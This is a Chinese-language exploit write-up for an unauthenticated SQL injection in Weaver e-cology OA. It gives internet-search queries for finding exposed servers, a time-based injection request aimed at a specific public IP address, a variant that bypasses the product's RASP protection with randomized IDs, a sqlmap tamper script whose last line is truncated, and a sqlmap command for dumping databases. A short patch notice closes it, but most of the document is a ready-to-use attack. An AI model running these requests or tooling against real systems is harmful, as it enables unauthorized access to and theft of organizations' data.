漏洞简介
泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
影响版本
Ecology 9.x 补丁版本 < 10.58.0;Ecology 8.x 补丁版本 < 10.58.0
漏洞复现
fofa查询语法:app="泛微-协同办公OA"
鹰图查询语法:app.name="泛微 e-cology 9.0 OA"
登录页面如下:
POC:
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 220.189.254.253:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
fileid=123+WAITFOR+DELAY+'0:0:15'&isFromOutImg=1
因泛微 OA 启用了 RASP,同一个执行语句第二次注入就会被拦截,因此需要不断修改请求包。给出绕过的请求包:
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 220.189.254.253:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1
加载tamper脚本进行注入
import os,re,random
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
priority = PRIORITY.HIGHEST
def tamper(payload, **kwargs):
result = ""
num = random.randint(1,2**27)
result = str(num)+payload
return resul
尝试注入:
python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs
漏洞修复
目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至10.58及以上。
https://www.weaver.com.cn/cs/securityDownload.asp#